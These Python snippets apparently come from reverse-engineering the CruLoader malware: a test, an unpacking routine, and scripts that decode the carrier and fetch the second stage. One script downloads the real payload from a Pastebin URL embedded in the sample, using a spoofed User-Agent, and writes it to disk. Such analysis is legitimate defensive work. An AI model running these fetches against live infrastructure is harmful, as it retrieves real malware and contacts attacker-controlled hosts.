def test_xor():
    """Check xor() against two known ciphertexts of b"hello world".

    The first uses the single-byte key 0xff, the second the three-byte
    key b"hi!"; both must decode to the same plaintext.
    """
    cases = [
        (0xff, b"\x97\x9a\x93\x93\x90\xdf\x88\x90\x8d\x93\x9b"),
        (b"hi!", b"\x00\x0cM\x04\x06\x01\x1f\x06S\x04\r"),
    ]
    for key, ciphertext in cases:
        assert xor(key, ciphertext) == b"hello world"
# NOTE(review): this is a fragment of a larger unpacking script. get_rsrc,
# key_offset, key_size, s, url_regexp, headers, rc4, rol, xor and requests are
# defined before this point, and the script appears to continue after the
# trailing comment (which announces a request that is not shown here).

# Second layer: RC4-decrypt the resource blob with the key carved out of it.
rc4_key = get_rsrc[key_offset:key_offset+key_size]
encrypted = get_rsrc[28:]  # bytes before offset 28 are skipped — header/key region, TODO confirm layout
decrypted = rc4(rc4_key, encrypted)
print("[+] Second layer unpacked")
# A successful decryption must start with the "MZ" DOS-header magic of a PE file.
if decrypted[0:2].decode('latin1') != "MZ":
    print("[-] RC4 decryption failed")
    # Seems malduck ROL needs data type int according to the documentation
else:
    convert_rol = (decrypted[0:])
    # Third layer: rotate each byte left by 4 (8-bit), then XOR with 0xC5.
    # Iterating over bytes yields ints, which is the type rol() expects.
    for index,value in enumerate(convert_rol):
        a = rol(value, 4, bits=8)
        #convert back to bytes for malduck.xor
        b = bytes(chr(a), 'latin1')
        dexor = xor(0xC5, b)
        s += dexor  # s accumulates the decoded bytes; it must be initialised before this fragment
    rolxor_data = (s.decode('latin-1'))
    # Iterate through the data to find any regexp matches
    get_urls = url_regexp.finditer(rolxor_data)
    for matched_value in get_urls:
        matched_url = (matched_value.group())
        #URL found in CruLoader sample
        url = matched_url
        print("[+] Found URL in file: " + url)
        # NOTE(review): the URL is taken straight from the sample, so this request
        # contacts infrastructure chosen by the malware author; no timeout= is set,
        # so an unresponsive host will hang the script.
        r = requests.get(f'{url}', headers=headers)
        first_response = r.content.decode('utf-8')
        #Parse the data from the Pastebin webpage and send a new request
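#!/usr/bin/env python3
"""Trim a CruLoader carrier file down to its XOR-encoded payload.

Usage: script.py <infile>

The embedded payload starts right after the marker 'redaolurc'
("cruloader" reversed). Everything after that marker is XOR-decoded with
the single-byte key 0x61 and written to trimmed.bin in the current directory.
"""
import sys

import malduck

if len(sys.argv) != 2:
    print(f"usage: {sys.argv[0]} <infile>", file=sys.stderr)
    sys.exit(2)
infile = sys.argv[1]
with open(infile, 'rb') as f:
    payload = f.read()  # keep raw bytes; the marker search and XOR work on bytes

# Marker that precedes the encoded payload ("cruloader" spelled backwards).
png_marker = bytes('redaolurc', 'latin1')
m = payload.find(png_marker)
if m == -1:
    # bytes.find() returns -1 when the marker is absent; without this guard the
    # slice below would silently start at offset len(marker) - 1 and write garbage.
    print("[-] Marker 'redaolurc' not found in input file", file=sys.stderr)
    sys.exit(1)
png_marker_len = len(png_marker)
trimmed_file = (payload[m + png_marker_len:])

# Single-byte XOR key observed in this sample (hard-coded).
dexor = malduck.xor(0x61, trimmed_file)
with open('trimmed.bin', 'wb') as o:
    o.write(dexor)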
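"""Fetch and decode the CruLoader second-stage payload.

The sample embeds a Pastebin URL; the raw paste content is a second URL that
serves the XOR-encoded payload. The payload is decoded with the single-byte
key 0x61 and written to payload.bin.

The requests below go to infrastructure referenced by the sample itself, so
this is intended to be run from an isolated analysis environment.
"""
# Todo brute XOR instead of static hex value, possibly using malduck Yara
# Todo 2 trim de-XOR:ed MZ file. For now I am piping the downloaded payload through the tool "cut-bytes.py '[4D5A90]':" from Didier Stevens.
import requests
import malduck

# URL found in CruLoader sample
url = 'https://pastebin.com/raw/mLem9DGk'
# Change the User-Agent to look less suspicious
headers = {'User-Agent': 'cruloader'}
# Bound every request so an unresponsive host cannot hang the script indefinitely.
REQUEST_TIMEOUT = 30

r = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT)
r.raise_for_status()  # an HTTP error body must not be treated as the next URL
first_response = r.content.decode('utf-8')

# Parse the data from the Pastebin webpage and send a new request.
# The paste body is used as a URL, so surrounding whitespace/newlines are
# stripped — they can never be part of a valid URL and would break the request.
new_url = first_response.strip()
n = requests.get(new_url, headers=headers, timeout=REQUEST_TIMEOUT)
n.raise_for_status()
payload = n.content

# De-XOR payload with the single-byte key observed in this sample
key = 0x61
decrypted = malduck.xor(key, payload)

# Write payload to disk
with open("payload.bin", 'wb') as o:
    o.write(decrypted)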